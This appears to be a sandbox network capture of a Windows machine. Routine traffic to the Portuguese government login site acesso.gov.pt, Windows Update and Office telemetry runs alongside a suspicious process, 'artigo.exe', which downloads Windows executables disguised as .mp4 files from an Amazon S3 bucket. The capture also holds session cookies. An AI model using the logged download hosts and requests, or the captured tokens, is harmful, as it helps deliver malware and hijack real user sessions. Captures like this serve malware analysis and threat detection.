                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:57 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 1609
                                                                                                                  2024-11-14 13:59:58 UTC1609INData Raw: 76 61 72 20 63 61 70 73 6c 6f 63 6b 41 63 74 69 76 65 20 3d 20 66 61 6c 73 65 3b 0d 0a 76 61 72 20 69 6e 70 75 74 4e 69 66 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 73 73 77 6f 72 64 2d 6e 69 66 22 29 3b 0d 0a 76 61 72 20 69 6e 70 75 74 45 6f 72 69 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 73 73 77 6f 72 64 2d 65 6f 72 69 22 29 3b 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 61 70 73 4c 6f 63 6b 45 76 65 6e 74 44 65 74 65 63 74 28 65 76 65 6e 74 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 63 61 70 73 4e 69 66 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 61 70 73 2d 6e 69 66 22 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 61 70 73 45
                                                                                                                  Data Ascii: var capslockActive = false;var inputNif = document.getElementById("password-nif");var inputEori = document.getElementById("password-eori");function capsLockEventDetect(event) { var capsNif = document.getElementById("caps-nif"); var capsE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49778 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-14 13:59:57 UTC | 924 | OUT | GET /autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:58 UTC | 370 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:57 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 35961
                                                                                                                  2024-11-14 13:59:58 UTC | 16014 | IN |
                                                                                                                  Data Ascii: /*! * Bootstrap v3.3.4 (http://getbootstrap.com) * Copyright 2011-2015 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQ
                                                                                                                  2024-11-14 13:59:58 UTC | 16384 | IN |
                                                                                                                  Data Ascii: eFocus=function(){a(document).off("focusin.bs.modal").on("focusin.bs.modal",a.proxy(function(a){this.$element[0]===a.target||this.$element.has(a.target).length||this.$element.trigger("focus")},this))},c.prototype.escape=function(){this.isShown&&this.optio
                                                                                                                  2024-11-14 13:59:58 UTC | 370 | IN |
                                                                                                                  Data Ascii: ented()){var h=a(d);this.activate(b.closest("li"),c),this.activate(h,h.parent(),function(){e.trigger({type:"hidden.bs.tab",relatedTarget:b[0]}),b.trigger({type:"shown.bs.tab",relatedTarget:e[0]})})}}},c.prototype.activate=function(b,d,e){function f(){g.re
                                                                                                                  2024-11-14 13:59:58 UTC | 3193 | IN |
                                                                                                                  Data Ascii: ("aria-expanded",!1),b.addClass("active").find('[data-toggle="tab"]').attr("aria-expanded",!0),h?(b[0].offsetWidth,b.addClass("in")):b.removeClass("fade"),b.parent(".dropdown-menu").length&&b.closest("li.dropdown").addClass("active").end().find('[data-tog


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  39 | 192.168.2.4 | 49779 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:57 UTC | 898 | OUT | GET /autentica_static/js/app.js?cb=5.2.10 HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:58 UTC | 370 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Content-Type: text/javascript
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:57 GMT
                                                                                                                  Age: 1
                                                                                                                  Content-Length: 58651
                                                                                                                  2024-11-14 13:59:58 UTC | 16014 | IN |
                                                                                                                  Data Ascii: (function ($) { if (!window.SA) { SA = {}; } //* //* Generic Modal Function (Open and Close) //* SA.Modal = function () { return { Open: function (id, callback) { id.fadeIn(
                                                                                                                  2024-11-14 13:59:58 UTC | 16384 | IN |
                                                                                                                  Data Ascii: arent().parent().removeClass('has-error'); } theForm.find('input, select, checkbox, textarea').removeClass('help-block'); label.remove(); },
                                                                                                                  2024-11-14 13:59:58 UTC | 370 | IN |
                                                                                                                  Data Ascii: Btn.click(function(event){ event.preventDefault(); if(submitBtn.hasClass('externalParticipant')) { SA.Modal.Open($('#confirmModal'),function(){ var submi
                                                                                                                  2024-11-14 13:59:58 UTC | 16384 | IN |
                                                                                                                  Data Ascii: ).bind('click',function(){ checkterms.find('input').prop('checked', true); disableElements([submitBtn, submitBtnExternalParticipant]); theForm.submit();
                                                                                                                  2024-11-14 13:59:58 UTC | 9499 | IN |
                                                                                                                  Data Ascii: = $(this).parent().parent(); } else { elmContainer = $(this).parent(); $(this).removeClass('has-error'); } elmContainer.removeClass('has-er


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  40 | 192.168.2.4 | 49781 | 62.28.254.215 | 443 | 7208 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 13:59:58 UTC | 896 | OUT | GET /autentica_static/icons/favicon.ico HTTP/1.1
                                                                                                                  Host: www.acesso.gov.pt
                                                                                                                  Connection: keep-alive
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept: */*
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
                                                                                                                  2024-11-14 13:59:59 UTC | 375 | IN | HTTP/1.1 200 OK
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Last-Modified: Tue, 29 Oct 2024 12:00:34 GMT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Keep-Alive: timeout=2, max=64
                                                                                                                  Content-Type: image/x-icon
                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                  Connection: close
                                                                                                                  Date: Thu, 14 Nov 2024 13:59:59 GMT
                                                                                                                  Age: 3
                                                                                                                  Content-Length: 6518
                                                                                                                  2024-11-14 13:59:59 UTC | 6518 | IN |
                                                                                                                  Data Ascii: (& (N( yiS.rasU@wZFP*N(


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  41 | 192.168.2.4 | 49782 | 4.245.163.56 | 443 | |
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:05 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rBgTCMhWGuf+1Pc&MD=RoRLZT8E HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                  2024-11-14 14:00:05 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Expires: -1
                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                  MS-CorrelationId: 62002161-0402-49cc-91a0-8816a746a328
                                                                                                                  MS-RequestId: 07a65de5-9c1c-4f70-acae-6a253f2c5f16
                                                                                                                  MS-CV: 7uoFpbOQlkuaEg5Y.0
                                                                                                                  X-Microsoft-SLSClientCache: 2880
                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:04 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 24490
                                                                                                                  2024-11-14 14:00:05 UTC | 15824 | IN |
                                                                                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                  2024-11-14 14:00:05 UTC | 8666 | IN |
                                                                                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  42 | 192.168.2.4 | 49788 | 16.12.9.46 | 443 | 7892 | C:\Users\Public\Termos\artigo.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:14 UTC | 141 | OUT | GET /basketchampion.mp4 HTTP/1.1
                                                                                                                  User-Agent: lspcv2.exe
                                                                                                                  Host: happychristmaslegado.s3.eu-north-1.amazonaws.com
                                                                                                                  Cache-Control: no-cache
                                                                                                                  2024-11-14 14:00:14 UTC | 420 | IN | HTTP/1.1 200 OK
                                                                                                                  x-amz-id-2: 8oDLDjHVU4jhhgj6AzW1afiVhHfPKHRirPToY1bpeb5hy6lsN0th9kXNtNZ5FapcQZmcIk5CjiU=
                                                                                                                  x-amz-request-id: ZJBG4Z0CEYDBDET0
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:15 GMT
                                                                                                                  Last-Modified: Wed, 13 Nov 2024 10:55:34 GMT
                                                                                                                  ETag: "1ebfee2e076e5082ab276012cc572f9e-2"
                                                                                                                  x-amz-server-side-encryption: AES256
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Type: video/mp4
                                                                                                                  Content-Length: 32891509
                                                                                                                  Server: AmazonS3
                                                                                                                  Connection: close
                                                                                                                  Data Ascii: MZP@!L!This program must be run under Win64$7


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  43 | 192.168.2.4 | 49789 | 16.12.9.46 | 443 | 7892 | C:\Users\Public\Termos\artigo.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:14 UTC | 136 | OUT | GET /alphaville.mp4 HTTP/1.1
                                                                                                                  User-Agent: place.exe
                                                                                                                  Host: happychristmaslegado.s3.eu-north-1.amazonaws.com
                                                                                                                  Cache-Control: no-cache
                                                                                                                  2024-11-14 14:00:14 UTC | 420 | IN | HTTP/1.1 200 OK
                                                                                                                  x-amz-id-2: 383ShuUP2a3U97evcIPzGBPs4xSr1aLxP3KMtVF6AxmbfrDEhy6kswc+F4eoE52bXek1yF686ik=
                                                                                                                  x-amz-request-id: ZJBWE7PZGP2VQ7N1
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:15 GMT
                                                                                                                  Last-Modified: Wed, 13 Nov 2024 10:29:28 GMT
                                                                                                                  ETag: "25e2a378cda74225b345465dac630855-2"
                                                                                                                  x-amz-server-side-encryption: AES256
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  Content-Type: video/mp4
                                                                                                                  Content-Length: 19375329
                                                                                                                  Server: AmazonS3
                                                                                                                  Connection: close
                                                                                                                  Data Ascii: MZP@!L!This program must be run under Win64$7


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  44 | 192.168.2.4 | 49796 | 172.202.163.200 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:43 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rBgTCMhWGuf+1Pc&MD=RoRLZT8E HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                  2024-11-14 14:00:44 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Expires: -1
                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                  MS-CorrelationId: c103e2b4-b541-4952-bcd3-ac32fbc1d741
                                                                                                                  MS-RequestId: cda27193-5775-43ad-a4ae-9632df226673
                                                                                                                  MS-CV: G6+r4YhVx0Gr52Q9.0
                                                                                                                  X-Microsoft-SLSClientCache: 1440
                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:43 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 30005


Session ID  Source IP    Source Port  Destination IP  Destination Port
45          192.168.2.4  49798        13.107.246.45   443

Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:00:44 UTC  195                OUT        GET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
2024-11-14 14:00:44 UTC  471                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:44 GMT
                                                                                                                  Content-Type: text/plain
                                                                                                                  Content-Length: 218853
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public
                                                                                                                  Last-Modified: Wed, 13 Nov 2024 03:39:40 GMT
                                                                                                                  ETag: "0x8DD0394CDDBD898"
                                                                                                                  x-ms-request-id: 406a0d50-a01e-0002-58e4-355074000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140044Z-16547b76f7fr4g8xhC1DFW9cqc0000000hz0000000006rvk
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
2024-11-14 14:00:44 UTC  15913              IN         Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-14 14:00:44 UTC  16384              IN         Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-14 14:00:45 UTC  16384              IN         Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-14 14:00:45 UTC  16384              IN         Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-14 14:00:45 UTC  16384              IN         Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-14 14:00:45 UTC  16384              IN         Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-14 14:00:45 UTC  16384              IN         Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-14 14:00:45 UTC  16384              IN         Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-14 14:00:45 UTC  16384              IN         Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-14 14:00:45 UTC  16384              IN         Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


Session ID  Source IP    Source Port  Destination IP  Destination Port
46          192.168.2.4  49802        13.107.246.45   443

Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:00:46 UTC  192                OUT        GET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
2024-11-14 14:00:46 UTC  494                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:46 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 2980
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                  ETag: "0x8DC582BA80D96A1"
                                                                                                                  x-ms-request-id: 26663d07-401e-0029-2faf-319b43000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140046Z-16547b76f7f775p5hC1DFWzdvn0000000kq000000000c437
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
2024-11-14 14:00:46 UTC  2980               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


Session ID  Source IP    Source Port  Destination IP  Destination Port
47          192.168.2.4  49804        13.107.246.45   443

Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:00:46 UTC  192                OUT        GET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
2024-11-14 14:00:46 UTC  495                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:46 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 2160
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                  ETag: "0x8DC582BA3B95D81"
                                                                                                                  x-ms-request-id: cd763138-801e-007b-249d-36e7ab000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140046Z-r178fb8d765j7nnvhC1DFW39w400000001q000000000c67m
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_MISS
                                                                                                                  Accept-Ranges: bytes
2024-11-14 14:00:46 UTC  2160               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


Session ID  Source IP    Source Port  Destination IP  Destination Port
48          192.168.2.4  49803        13.107.246.45   443

Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:00:46 UTC  192                OUT        GET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
2024-11-14 14:00:46 UTC  470                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:46 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 408
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                  ETag: "0x8DC582BB56D3AFB"
                                                                                                                  x-ms-request-id: f8aed360-a01e-0032-69a0-341949000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140046Z-1749fc9bdbdcm45lhC1DFWeab800000002f0000000009uf7
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
2024-11-14 14:00:46 UTC  408                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


Session ID  Source IP    Source Port  Destination IP  Destination Port
49          192.168.2.4  49801        13.107.246.45   443

Timestamp                Bytes transferred  Direction  Data
2024-11-14 14:00:46 UTC  193                OUT        GET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
2024-11-14 14:00:46 UTC  538                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:46 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 3788
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                  ETag: "0x8DC582BAC2126A6"
                                                                                                                  x-ms-request-id: be525922-801e-00a0-03ff-2c2196000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140046Z-16547b76f7fdtmzhhC1DFW6zhc00000007m000000000cdux
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
2024-11-14 14:00:46 UTC | 3788 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


Session ID | Source IP | Source Port | Destination IP | Destination Port
50 | 192.168.2.4 | 49806 | 13.107.246.45 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-14 14:00:46 UTC | 192 | OUT | GET /rules/rule120610v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-11-14 14:00:47 UTC | 470 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:00:46 GMT
Content-Type: text/xml
Content-Length: 474
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
ETag: "0x8DC582B9964B277"
x-ms-request-id: 2cc20079-501e-00a0-320a-369d9f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241114T140046Z-r178fb8d765mr9nqhC1DFWs8m800000000xg000000004vq7
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
